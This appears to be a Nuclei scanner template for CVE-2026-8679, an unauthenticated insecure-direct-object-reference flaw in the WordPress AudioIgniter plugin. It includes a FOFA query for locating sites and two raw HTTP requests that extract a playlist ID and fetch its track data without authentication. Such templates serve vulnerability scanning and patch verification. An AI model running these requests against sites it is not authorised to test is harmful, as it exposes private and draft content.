id: CVE-2026-8679

info:
  name: WordPress AudioIgniter <= 2.0.2 - Unauthenticated IDOR
  author: 0x_Akoko
  severity: high
  description: |
    The AudioIgniter plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. The handle_playlist_endpoint() function accepted a user-controlled playlist ID and returned track data without authentication.
  impact: |
    Unauthenticated attackers can access sensitive playlist metadata including private and draft content, leading to information disclosure.
  remediation: |
    Update to the latest version of AudioIgniter plugin.
  reference:
    - https://plugins.trac.wordpress.org/browser/audioigniter/trunk/audioigniter.php
    - https://nvd.nist.gov/vuln/detail/CVE-2026-8679
    - https://wordpress.org/plugins/audioigniter/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-8679
    epss-score: 0.27684
    epss-percentile: 0.96536
    cwe-id: CWE-639
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="audioigniter_playlist_id"
  tags: cve,cve2026,wordpress,wp-plugin,audioigniter,idor,exposure,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "audioigniter_playlist_id")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: playlist_id
        part: body
        regex:
          - 'audioigniter_playlist_id=(\d+)'
        group: 1
        internal: true

  - raw:
      - |
        GET /?audioigniter_playlist_id={{playlist_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"title\"", "\"audio\"", "\"subtitle\"")'
        condition: and
# digest: 4a0a004730450220592a6092289920960149d5d9c3e4e4a1bd6918f31f5e6dc9c79a406ccd906b35022100a4c20540d574ae8f50f50755f46c883db7535dec41add0a250a58949f48ca57b:922c64590222798bb761d5b6d8e72950